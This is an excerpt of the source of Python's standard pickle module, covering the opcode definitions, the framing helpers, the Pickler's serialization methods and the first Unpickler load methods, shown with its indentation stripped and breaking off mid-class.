class _Stop(Exception):
def __init__(self, value):
self.value = value
# Jython has PyStringMap; it's a dict subclass with string keys
try:
from org.python.core import PyStringMap
except ImportError:
PyStringMap = None
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING = b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
__all__.extend([x for x in dir() if re.match("[A-Z][A-Z0-9_]+$", x)])
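# Worked example (illustrative): the protocol-0 pickle of the integer 1 is the
# byte string b'I1\n.', i.e. the INT opcode with a decimal argument followed by
# STOP, while protocol 2 emits b'\x80\x02K\x01.' (PROTO 2, BININT1 1, STOP).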
class _Framer:
_FRAME_SIZE_MIN = 4
_FRAME_SIZE_TARGET = 64 * 1024
def __init__(self, file_write):
self.file_write = file_write
self.current_frame = None
def start_framing(self):
self.current_frame = io.BytesIO()
def end_framing(self):
if self.current_frame and self.current_frame.tell() > 0:
self.commit_frame(force=True)
self.current_frame = None
def commit_frame(self, force=False):
if self.current_frame:
f = self.current_frame
if f.tell() >= self._FRAME_SIZE_TARGET or force:
data = f.getbuffer()
write = self.file_write
if len(data) >= self._FRAME_SIZE_MIN:
# Issue a single call to the write method of the underlying
# file object for the frame opcode with the size of the
# frame. The concatenation is expected to be less expensive
# than issuing an additional call to write.
write(FRAME + pack("<Q", len(data)))
# Issue a separate call to write to append the frame
# contents without concatenation to the above to avoid a
# memory copy.
write(data)
# Start the new frame with a new io.BytesIO instance so that
# the file object can have delayed access to the previous frame
# contents via an unreleased memoryview of the previous
# io.BytesIO instance.
self.current_frame = io.BytesIO()
def write(self, data):
if self.current_frame:
return self.current_frame.write(data)
else:
return self.file_write(data)
def write_large_bytes(self, header, payload):
write = self.file_write
if self.current_frame:
# Terminate the current frame and flush it to the file.
self.commit_frame(force=True)
# Perform direct write of the header and payload of the large binary
# object. Be careful not to concatenate the header and the payload
# prior to calling 'write' as we do not want to allocate a large
# temporary bytes object.
# We intentionally do not insert a protocol 4 frame opcode to make
# it possible to optimize file.read calls in the loader.
write(header)
write(payload)
class _Unframer:
def __init__(self, file_read, file_readline, file_tell=None):
self.file_read = file_read
self.file_readline = file_readline
self.current_frame = None
def read(self, n):
if self.current_frame:
data = self.current_frame.read(n)
if not data and n != 0:
self.current_frame = None
return self.file_read(n)
if len(data) < n:
raise UnpicklingError(
"pickle exhausted before end of frame")
return data
else:
return self.file_read(n)
def readline(self):
if self.current_frame:
data = self.current_frame.readline()
if not data:
self.current_frame = None
return self.file_readline()
if data[-1] != b'\n'[0]:
raise UnpicklingError(
"pickle exhausted before end of frame")
return data
else:
return self.file_readline()
def load_frame(self, frame_size):
if self.current_frame and self.current_frame.read() != b'':
raise UnpicklingError(
"beginning of a new frame before end of current frame")
self.current_frame = io.BytesIO(self.file_read(frame_size))
# Tools used for pickling.
def _getattribute(obj, name):
for subpath in name.split('.'):
if subpath == '<locals>':
raise AttributeError("Can't get local attribute {!r} on {!r}"
.format(name, obj))
try:
parent = obj
obj = getattr(obj, subpath)
except AttributeError:
raise AttributeError("Can't get attribute {!r} on {!r}"
.format(name, obj)) from None
return obj, parent
def whichmodule(obj, name):
"""Find the module an object belong to."""
module_name = getattr(obj, '__module__', None)
if module_name is not None:
return module_name
# Protect the iteration by using a list copy of sys.modules against dynamic
# modules that trigger imports of other modules upon calls to getattr.
for module_name, module in list(sys.modules.items()):
if module_name == '__main__' or module is None:
continue
try:
if _getattribute(module, name)[0] is obj:
return module_name
except AttributeError:
pass
return '__main__'
def encode_long(x):
r"""Encode a long to a two's complement little-endian binary string.
Note that 0 is a special case, returning an empty string, to save a
byte in the LONG1 pickling context.
>>> encode_long(0)
b''
>>> encode_long(255)
b'\xff\x00'
>>> encode_long(32767)
b'\xff\x7f'
>>> encode_long(-256)
b'\x00\xff'
>>> encode_long(-32768)
b'\x00\x80'
>>> encode_long(-128)
b'\x80'
>>> encode_long(127)
b'\x7f'
>>>
"""
if x == 0:
return b''
nbytes = (x.bit_length() >> 3) + 1
result = x.to_bytes(nbytes, byteorder='little', signed=True)
if x < 0 and nbytes > 1:
if result[-1] == 0xff and (result[-2] & 0x80) != 0:
result = result[:-1]
return result
def decode_long(data):
r"""Decode a long from a two's complement little-endian binary string.
>>> decode_long(b'')
0
>>> decode_long(b"\xff\x00")
255
>>> decode_long(b"\xff\x7f")
32767
>>> decode_long(b"\x00\xff")
-256
>>> decode_long(b"\x00\x80")
-32768
>>> decode_long(b"\x80")
-128
>>> decode_long(b"\x7f")
127
"""
return int.from_bytes(data, byteorder='little', signed=True)
# Pickling machinery
class _Pickler:
def __init__(self, file, protocol=None, *, fix_imports=True):
"""This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the
given protocol; supported protocols are 0, 1, 2, 3 and 4. The
default protocol is 3; a backward-incompatible protocol designed
for Python 3.
Specifying a negative protocol version selects the highest
protocol version supported. The higher the protocol used, the
more recent the version of Python needed to read the pickle
produced.
The *file* argument must have a write() method that accepts a
single bytes argument. It can thus be a file object opened for
binary writing, an io.BytesIO instance, or any other custom
object that meets this interface.
If *fix_imports* is True and *protocol* is less than 3, pickle
will try to map the new Python 3 names to the old module names
used in Python 2, so that the pickle data stream is readable
with Python 2.
"""
if protocol is None:
protocol = DEFAULT_PROTOCOL
if protocol < 0:
protocol = HIGHEST_PROTOCOL
elif not 0 <= protocol <= HIGHEST_PROTOCOL:
raise ValueError("pickle protocol must be <= %d" % HIGHEST_PROTOCOL)
try:
self._file_write = file.write
except AttributeError:
raise TypeError("file must have a 'write' attribute")
self.framer = _Framer(self._file_write)
self.write = self.framer.write
self._write_large_bytes = self.framer.write_large_bytes
self.memo = {}
self.proto = int(protocol)
self.bin = protocol >= 1
self.fast = 0
self.fix_imports = fix_imports and protocol < 3
def clear_memo(self):
"""Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects
are pickled by reference and not by value. This method is
useful when re-using picklers.
"""
self.memo.clear()
def dump(self, obj):
"""Write a pickled representation of obj to the open file."""
# Check whether Pickler was initialized correctly. This is
# only needed to mimic the behavior of _pickle.Pickler.dump().
if not hasattr(self, "_file_write"):
raise PicklingError("Pickler.__init__() was not called by "
"%s.__init__()" % (self.__class__.__name__,))
if self.proto >= 2:
self.write(PROTO + pack("<B", self.proto))
if self.proto >= 4:
self.framer.start_framing()
self.save(obj)
self.write(STOP)
self.framer.end_framing()
def memoize(self, obj):
"""Store an object in the memo."""
# The Pickler memo is a dictionary mapping object ids to 2-tuples
# that contain the Unpickler memo key and the object being memoized.
# The memo key is written to the pickle and will become
# the key in the Unpickler's memo. The object is stored in the
# Pickler memo so that transient objects are kept alive during
# pickling.
# The use of the Unpickler memo length as the memo key is just a
# convention. The only requirement is that the memo values be unique.
# But there appears no advantage to any other scheme, and this
# scheme allows the Unpickler memo to be implemented as a plain (but
# growable) array, indexed by memo key.
if self.fast:
return
assert id(obj) not in self.memo
idx = len(self.memo)
self.write(self.put(idx))
self.memo[id(obj)] = idx, obj
# Return a PUT (BINPUT, LONG_BINPUT) opcode string, with argument i.
def put(self, idx):
if self.proto >= 4:
return MEMOIZE
elif self.bin:
if idx < 256:
return BINPUT + pack("<B", idx)
else:
return LONG_BINPUT + pack("<I", idx)
else:
return PUT + repr(idx).encode("ascii") + b'\n'
# Return a GET (BINGET, LONG_BINGET) opcode string, with argument i.
def get(self, i):
if self.bin:
if i < 256:
return BINGET + pack("<B", i)
else:
return LONG_BINGET + pack("<I", i)
return GET + repr(i).encode("ascii") + b'\n'
def save(self, obj, save_persistent_id=True):
self.framer.commit_frame()
# Check for persistent id (defined by a subclass)
pid = self.persistent_id(obj)
if pid is not None and save_persistent_id:
self.save_pers(pid)
return
# Check the memo
x = self.memo.get(id(obj))
if x is not None:
self.write(self.get(x[0]))
return
# Check the type dispatch table
t = type(obj)
f = self.dispatch.get(t)
if f is not None:
f(self, obj) # Call unbound method with explicit self
return
# Check private dispatch table if any, or else copyreg.dispatch_table
reduce = getattr(self, 'dispatch_table', dispatch_table).get(t)
if reduce is not None:
rv = reduce(obj)
else:
# Check for a class with a custom metaclass; treat as regular class
try:
issc = issubclass(t, type)
except TypeError: # t is not a class (old Boost; see SF #502085)
issc = False
if issc:
self.save_global(obj)
return
# Check for a __reduce_ex__ method, fall back to __reduce__
reduce = getattr(obj, "__reduce_ex__", None)
if reduce is not None:
rv = reduce(self.proto)
else:
reduce = getattr(obj, "__reduce__", None)
if reduce is not None:
rv = reduce()
else:
raise PicklingError("Can't pickle %r object: %r" %
(t.__name__, obj))
# Check for string returned by reduce(), meaning "save as global"
if isinstance(rv, str):
self.save_global(obj, rv)
return
# Assert that reduce() returned a tuple
if not isinstance(rv, tuple):
raise PicklingError("%s must return string or tuple" % reduce)
# Assert that it returned an appropriately sized tuple
l = len(rv)
if not (2 <= l <= 5):
raise PicklingError("Tuple returned by %s must have "
"two to five elements" % reduce)
# Save the reduce() output and finally memoize the object
self.save_reduce(obj=obj, *rv)
def persistent_id(self, obj):
# This exists so a subclass can override it
return None
def save_pers(self, pid):
# Save a persistent id reference
if self.bin:
self.save(pid, save_persistent_id=False)
self.write(BINPERSID)
else:
try:
self.write(PERSID + str(pid).encode("ascii") + b'\n')
except UnicodeEncodeError:
raise PicklingError(
"persistent IDs in protocol 0 must be ASCII strings")
def save_reduce(self, func, args, state=None, listitems=None,
dictitems=None, obj=None):
# This API is called by some subclasses
if not isinstance(args, tuple):
raise PicklingError("args from save_reduce() must be a tuple")
if not callable(func):
raise PicklingError("func from save_reduce() must be callable")
save = self.save
write = self.write
func_name = getattr(func, "__name__", "")
if self.proto >= 2 and func_name == "__newobj_ex__":
cls, args, kwargs = args
if not hasattr(cls, "__new__"):
raise PicklingError("args[0] from {} args has no __new__"
.format(func_name))
if obj is not None and cls is not obj.__class__:
raise PicklingError("args[0] from {} args has the wrong class"
.format(func_name))
if self.proto >= 4:
save(cls)
save(args)
save(kwargs)
write(NEWOBJ_EX)
else:
func = partial(cls.__new__, cls, *args, **kwargs)
save(func)
save(())
write(REDUCE)
elif self.proto >= 2 and func_name == "__newobj__":
# A __reduce__ implementation can direct protocol 2 or newer to
# use the more efficient NEWOBJ opcode, while still
# allowing protocol 0 and 1 to work normally. For this to
# work, the function returned by __reduce__ should be
# called __newobj__, and its first argument should be a
# class. The implementation for __newobj__
# should be as follows, although pickle has no way to
# verify this:
#
# def __newobj__(cls, *args):
# return cls.__new__(cls, *args)
#
# Protocols 0 and 1 will pickle a reference to __newobj__,
# while protocol 2 (and above) will pickle a reference to
# cls, the remaining args tuple, and the NEWOBJ code,
# which calls cls.__new__(cls, *args) at unpickling time
# (see load_newobj below). If __reduce__ returns a
# three-tuple, the state from the third tuple item will be
# pickled regardless of the protocol, calling __setstate__
# at unpickling time (see load_build below).
#
# Note that no standard __newobj__ implementation exists;
# you have to provide your own. This is to enforce
# compatibility with Python 2.2 (pickles written using
# protocol 0 or 1 in Python 2.3 should be unpicklable by
# Python 2.2).
cls = args[0]
if not hasattr(cls, "__new__"):
raise PicklingError(
"args[0] from __newobj__ args has no __new__")
if obj is not None and cls is not obj.__class__:
raise PicklingError(
"args[0] from __newobj__ args has the wrong class")
args = args[1:]
save(cls)
save(args)
write(NEWOBJ)
else:
save(func)
save(args)
write(REDUCE)
if obj is not None:
# If the object is already in the memo, this means it is
# recursive. In this case, throw away everything we put on the
# stack, and fetch the object back from the memo.
if id(obj) in self.memo:
write(POP + self.get(self.memo[id(obj)][0]))
else:
self.memoize(obj)
# More new special cases (that work with older protocols as
# well): when __reduce__ returns a tuple with 4 or 5 items,
# the 4th and 5th item should be iterators that provide list
# items and dict items (as (key, value) tuples), or None.
if listitems is not None:
self._batch_appends(listitems)
if dictitems is not None:
self._batch_setitems(dictitems)
if state is not None:
save(state)
write(BUILD)
# Methods below this point are dispatched through the dispatch table
dispatch = {}
def save_none(self, obj):
self.write(NONE)
dispatch[type(None)] = save_none
def save_bool(self, obj):
if self.proto >= 2:
self.write(NEWTRUE if obj else NEWFALSE)
else:
self.write(TRUE if obj else FALSE)
dispatch[bool] = save_bool
def save_long(self, obj):
if self.bin:
# If the int is small enough to fit in a signed 4-byte 2's-comp
# format, we can store it more efficiently than the general
# case.
# First one- and two-byte unsigned ints:
if obj >= 0:
if obj <= 0xff:
self.write(BININT1 + pack("<B", obj))
return
if obj <= 0xffff:
self.write(BININT2 + pack("<H", obj))
return
# Next check for 4-byte signed ints:
if -0x80000000 <= obj <= 0x7fffffff:
self.write(BININT + pack("<i", obj))
return
if self.proto >= 2:
encoded = encode_long(obj)
n = len(encoded)
if n < 256:
self.write(LONG1 + pack("<B", n) + encoded)
else:
self.write(LONG4 + pack("<i", n) + encoded)
return
if -0x80000000 <= obj <= 0x7fffffff:
self.write(INT + repr(obj).encode("ascii") + b'\n')
else:
self.write(LONG + repr(obj).encode("ascii") + b'L\n')
dispatch[int] = save_long
def save_float(self, obj):
if self.bin:
self.write(BINFLOAT + pack('>d', obj))
else:
self.write(FLOAT + repr(obj).encode("ascii") + b'\n')
dispatch[float] = save_float
def save_bytes(self, obj):
if self.proto < 3:
if not obj: # bytes object is empty
self.save_reduce(bytes, (), obj=obj)
else:
self.save_reduce(codecs.encode,
(str(obj, 'latin1'), 'latin1'), obj=obj)
return
n = len(obj)
if n <= 0xff:
self.write(SHORT_BINBYTES + pack("<B", n) + obj)
elif n > 0xffffffff and self.proto >= 4:
self._write_large_bytes(BINBYTES8 + pack("<Q", n), obj)
elif n >= self.framer._FRAME_SIZE_TARGET:
self._write_large_bytes(BINBYTES + pack("<I", n), obj)
else:
self.write(BINBYTES + pack("<I", n) + obj)
self.memoize(obj)
dispatch[bytes] = save_bytes
def save_str(self, obj):
if self.bin:
encoded = obj.encode('utf-8', 'surrogatepass')
n = len(encoded)
if n <= 0xff and self.proto >= 4:
self.write(SHORT_BINUNICODE + pack("<B", n) + encoded)
elif n > 0xffffffff and self.proto >= 4:
self._write_large_bytes(BINUNICODE8 + pack("<Q", n), encoded)
elif n >= self.framer._FRAME_SIZE_TARGET:
self._write_large_bytes(BINUNICODE + pack("<I", n), encoded)
else:
self.write(BINUNICODE + pack("<I", n) + encoded)
else:
obj = obj.replace("\\", "\\u005c")
obj = obj.replace("\n", "\\u000a")
self.write(UNICODE + obj.encode('raw-unicode-escape') +
b'\n')
self.memoize(obj)
dispatch[str] = save_str
def save_tuple(self, obj):
if not obj: # tuple is empty
if self.bin:
self.write(EMPTY_TUPLE)
else:
self.write(MARK + TUPLE)
return
n = len(obj)
save = self.save
memo = self.memo
if n <= 3 and self.proto >= 2:
for element in obj:
save(element)
# Subtle. Same as in the big comment below.
if id(obj) in memo:
get = self.get(memo[id(obj)][0])
self.write(POP * n + get)
else:
self.write(_tuplesize2code[n])
self.memoize(obj)
return
# proto 0 or proto 1 and tuple isn't empty, or proto > 1 and tuple
# has more than 3 elements.
write = self.write
write(MARK)
for element in obj:
save(element)
if id(obj) in memo:
# Subtle. d was not in memo when we entered save_tuple(), so
# the process of saving the tuple's elements must have saved
# the tuple itself: the tuple is recursive. The proper action
# now is to throw away everything we put on the stack, and
# simply GET the tuple (it's already constructed). This check
# could have been done in the "for element" loop instead, but
# recursive tuples are a rare thing.
get = self.get(memo[id(obj)][0])
if self.bin:
write(POP_MARK + get)
else: # proto 0 -- POP_MARK not available
write(POP * (n + 1) + get)
return
# No recursion.
write(TUPLE)
self.memoize(obj)
dispatch[tuple] = save_tuple
def save_list(self, obj):
if self.bin:
self.write(EMPTY_LIST)
else: # proto 0 -- can't use EMPTY_LIST
self.write(MARK + LIST)
self.memoize(obj)
self._batch_appends(obj)
dispatch[list] = save_list
_BATCHSIZE = 1000
def _batch_appends(self, items):
# Helper to batch up APPENDS sequences
save = self.save
write = self.write
if not self.bin:
for x in items:
save(x)
write(APPEND)
return
it = iter(items)
while True:
tmp = list(islice(it, self._BATCHSIZE))
n = len(tmp)
if n > 1:
write(MARK)
for x in tmp:
save(x)
write(APPENDS)
elif n:
save(tmp[0])
write(APPEND)
# else tmp is empty, and we're done
if n < self._BATCHSIZE:
return
def save_dict(self, obj):
if self.bin:
self.write(EMPTY_DICT)
else: # proto 0 -- can't use EMPTY_DICT
self.write(MARK + DICT)
self.memoize(obj)
self._batch_setitems(obj.items())
dispatch[dict] = save_dict
if PyStringMap is not None:
dispatch[PyStringMap] = save_dict
def _batch_setitems(self, items):
# Helper to batch up SETITEMS sequences; proto >= 1 only
save = self.save
write = self.write
if not self.bin:
for k, v in items:
save(k)
save(v)
write(SETITEM)
return
it = iter(items)
while True:
tmp = list(islice(it, self._BATCHSIZE))
n = len(tmp)
if n > 1:
write(MARK)
for k, v in tmp:
save(k)
save(v)
write(SETITEMS)
elif n:
k, v = tmp[0]
save(k)
save(v)
write(SETITEM)
# else tmp is empty, and we're done
if n < self._BATCHSIZE:
return
def save_set(self, obj):
save = self.save
write = self.write
if self.proto < 4:
self.save_reduce(set, (list(obj),), obj=obj)
return
write(EMPTY_SET)
self.memoize(obj)
it = iter(obj)
while True:
batch = list(islice(it, self._BATCHSIZE))
n = len(batch)
if n > 0:
write(MARK)
for item in batch:
save(item)
write(ADDITEMS)
if n < self._BATCHSIZE:
return
dispatch[set] = save_set
def save_frozenset(self, obj):
save = self.save
write = self.write
if self.proto < 4:
self.save_reduce(frozenset, (list(obj),), obj=obj)
return
write(MARK)
for item in obj:
save(item)
if id(obj) in self.memo:
# If the object is already in the memo, this means it is
# recursive. In this case, throw away everything we put on the
# stack, and fetch the object back from the memo.
write(POP_MARK + self.get(self.memo[id(obj)][0]))
return
write(FROZENSET)
self.memoize(obj)
dispatch[frozenset] = save_frozenset
def save_global(self, obj, name=None):
write = self.write
memo = self.memo
if name is None:
name = getattr(obj, '__qualname__', None)
if name is None:
name = obj.__name__
module_name = whichmodule(obj, name)
try:
__import__(module_name, level=0)
module = sys.modules[module_name]
obj2, parent = _getattribute(module, name)
except (ImportError, KeyError, AttributeError):
raise PicklingError(
"Can't pickle %r: it's not found as %s.%s" %
(obj, module_name, name)) from None
else:
if obj2 is not obj:
raise PicklingError(
"Can't pickle %r: it's not the same object as %s.%s" %
(obj, module_name, name))
if self.proto >= 2:
code = _extension_registry.get((module_name, name))
if code:
assert code > 0
if code <= 0xff:
write(EXT1 + pack("<B", code))
elif code <= 0xffff:
write(EXT2 + pack("<H", code))
else:
write(EXT4 + pack("<i", code))
return
lastname = name.rpartition('.')[2]
if parent is module:
name = lastname
# Non-ASCII identifiers are supported only with protocols >= 3.
if self.proto >= 4:
self.save(module_name)
self.save(name)
write(STACK_GLOBAL)
elif parent is not module:
self.save_reduce(getattr, (parent, lastname))
elif self.proto >= 3:
write(GLOBAL + bytes(module_name, "utf-8") + b'\n' +
bytes(name, "utf-8") + b'\n')
else:
if self.fix_imports:
r_name_mapping = _compat_pickle.REVERSE_NAME_MAPPING
r_import_mapping = _compat_pickle.REVERSE_IMPORT_MAPPING
if (module_name, name) in r_name_mapping:
module_name, name = r_name_mapping[(module_name, name)]
elif module_name in r_import_mapping:
module_name = r_import_mapping[module_name]
try:
write(GLOBAL + bytes(module_name, "ascii") + b'\n' +
bytes(name, "ascii") + b'\n')
except UnicodeEncodeError:
raise PicklingError(
"can't pickle global identifier '%s.%s' using "
"pickle protocol %i" % (module, name, self.proto)) from None
self.memoize(obj)
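# For reference (hedged): with protocol 4, pickling a class object such as
# collections.OrderedDict by reference emits the strings "collections" and
# "OrderedDict" followed by STACK_GLOBAL; with protocol 2 and a registered
# extension code, one of EXT1/EXT2/EXT4 is emitted instead.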
def save_type(self, obj):
if obj is type(None):
return self.save_reduce(type, (None,), obj=obj)
elif obj is type(NotImplemented):
return self.save_reduce(type, (NotImplemented,), obj=obj)
elif obj is type(...):
return self.save_reduce(type, (...,), obj=obj)
return self.save_global(obj)
dispatch[FunctionType] = save_global
dispatch[type] = save_type
# Unpickling machinery
class _Unpickler:
def __init__(self, file, *, fix_imports=True,
encoding="ASCII", errors="strict"):
"""This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so
no proto argument is needed.
The argument *file* must have two methods, a read() method that
takes an integer argument, and a readline() method that requires
no arguments. Both methods should return bytes. Thus *file*
can be a binary file object opened for reading, an io.BytesIO
object, or any other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and
*errors*, which are used to control compatibility support for
pickle stream generated by Python 2. If *fix_imports* is True,
pickle will try to map the old Python 2 names to the new names
used in Python 3. The *encoding* and *errors* tell pickle how
to decode 8-bit string instances pickled by Python 2; these
default to 'ASCII' and 'strict', respectively. *encoding* can be
'bytes' to read these 8-bit string instances as bytes objects.
"""
self._file_readline = file.readline
self._file_read = file.read
self.memo = {}
self.encoding = encoding
self.errors = errors
self.proto = 0
self.fix_imports = fix_imports
def load(self):
"""Read a pickled object representation from the open file.
Return the reconstituted object hierarchy specified in the file.
"""
# Check whether Unpickler was initialized correctly. This is
# only needed to mimic the behavior of _pickle.Unpickler.load().
if not hasattr(self, "_file_read"):
raise UnpicklingError("Unpickler.__init__() was not called by "
"%s.__init__()" % (self.__class__.__name__,))
self._unframer = _Unframer(self._file_read, self._file_readline)
self.read = self._unframer.read
self.readline = self._unframer.readline
self.metastack = []
self.stack = []
self.append = self.stack.append
self.proto = 0
read = self.read
dispatch = self.dispatch
try:
while True:
key = read(1)
if not key:
raise EOFError
assert isinstance(key, bytes_types)
dispatch[key[0]](self)
except _Stop as stopinst:
return stopinst.value
# Return a list of items pushed in the stack after last MARK instruction.
def pop_mark(self):
items = self.stack
self.stack = self.metastack.pop()
self.append = self.stack.append
return items
def persistent_load(self, pid):
raise UnpicklingError("unsupported persistent id encountered")
dispatch = {}
def load_proto(self):
proto = self.read(1)[0]
if not 0 <= proto <= HIGHEST_PROTOCOL:
raise ValueError("unsupported pickle protocol: %d" % proto)
self.proto = proto
dispatch[PROTO[0]] = load_proto
def load_frame(self):
frame_size, = unpack('<Q', self.read(8))
if frame_size > sys.maxsize:
raise ValueError("frame size > sys.maxsize: %d" % frame_size)
self._unframer.load_frame(frame_size)
dispatch[FRAME[0]] = load_frame
def load_persid(self):
try:
pid = self.readline()[:-1].decode("ascii")
except UnicodeDecodeError:
raise UnpicklingError(
"persistent IDs in protocol 0 must be ASCII strings")
self.append(self.persistent_load(pid))
dispatch[PERSID[0]] = load_persid
def load_binpersid(self):
pid = self.stack.pop()
self.append(self.persistent_load(pid))
dispatch[BINPERSID[0]] = load_binpersid
def load_none(self):
self.append(None)
dispatch[NONE[0]] = load_none
def load_false(self):
self.append(False)
dispatch[NEWFALSE[0]] = load_false
def load_true(self):
self.append(True)
dispatch[NEWTRUE[0]] = load_true
def load_int(self):
data = self.readline()
if data == FALSE[1:]:
val = False
elif data == TRUE[1:]:
val = True
else:
val = int(data, 0)
self.append(val)
dispatch[INT[0]] = load_int
def load_binint(self):
self.append(unpack('<i', self.read(4))[0])
dispatch[BININT[0]] = load_binint
def load_binint1(self):
self.append(self.read(1)[0])
dispatch[BININT1[0]] = load_binint1
def load_binint2(self):
self.append(unpack('<H', self.read(2))[0])
dispatch[BININT2[0]] = load_binint2
def load_long(self):
val = self.readline()[:-1]
if val and val[-1] == b'L'[0]:
val = val[:-1]
self.append(int(val, 0))
dispatch[LONG[0]] = load_long
def load_long1(self):
n = self.read(1)[0]
data = self.read(n)
self.append(decode_long(data))
dispatch[LONG1[0]] = load_long1
def load_long4(self):
n, = unpack('<i', self.read(4))
if n < 0:
# Corrupt or hostile pickle -- we never write one like this
raise UnpicklingError("LONG pickle has negative byte count")
data = self.read(n)
self.append(decode_long(data))
dispatch[LONG4[0]] = load_long4
def load_float(self):
self.append(float(self.readline()[:-1]))
dispatch[FLOAT[0]] = load_float
def load_binfloat(self):
self.append(unpack('>d', self.read(8))[0])
dispatch[BINFLOAT[0]] = load_binfloat
def _decode_string(self, value):
# Used to allow strings from Python 2 to be decoded either as
# bytes or Unicode strings. This should be used only with the
# STRING, BINSTRING and SHORT_BINSTRING opcodes.
if self.encoding == "bytes":
return value
else:
return value.decode(self.encoding, self.errors)
def load_string(self):
data = self.readline()[:-1]
# Strip outermost quotes
if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
data = data[1:-1]
else:
raise UnpicklingError("the STRING opcode argument must be quoted")
self.append(self._decode_string(codecs.escape_decode(data)[0]))
dispatch[STRING[0]] = load_string
def load_binstring(self):
# Deprecated BINSTRING uses signed 32-bit length
len, = unpack('<i', self.read(4))
if len < 0:
raise UnpicklingError("BINSTRING pickle has negative byte count")
data = self.read(len)
self.append(self._decode_string(data))
dispatch[BINSTRING[0]] = load_binstring
def load_binbytes(self):
len, = unpack('<I', self.read(4))
if len > maxsize:
raise UnpicklingError("BINBYTES exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(self.read(len))
dispatch[BINBYTES[0]] = load_binbytes
def load_unicode(self):
self.append(str(self.readline()[:-1], 'raw-unicode-escape'))
dispatch[UNICODE[0]] = load_unicode
def load_binunicode(self):
len, = unpack('<I', self.read(4))
if len > maxsize:
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[BINUNICODE[0]] = load_binunicode
def load_binunicode8(self):
len, = unpack('<Q', self.read(8))
if len > maxsize:
raise UnpicklingError("BINUNICODE8 exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[BINUNICODE8[0]] = load_binunicode8
def load_binbytes8(self):
len, = unpack('<Q', self.read(8))
if len > maxsize:
raise UnpicklingError("BINBYTES8 exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(self.read(len))
dispatch[BINBYTES8[0]] = load_binbytes8
def load_short_binstring(self):
len = self.read(1)[0]
data = self.read(len)
self.append(self._decode_string(data))
dispatch[SHORT_BINSTRING[0]] = load_short_binstring
def load_short_binbytes(self):
len = self.read(1)[0]
self.append(self.read(len))
dispatch[SHORT_BINBYTES[0]] = load_short_binbytes
def load_short_binunicode(self):
len = self.read(1)[0]
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[SHORT_BINUNICODE[0]] = load_short_binunicode
def load_tuple(self):
items = self.pop_mark()
self.append(tuple(items))
dispatch[TUPLE[0]] = load_tuple
def load_empty_tuple(self):
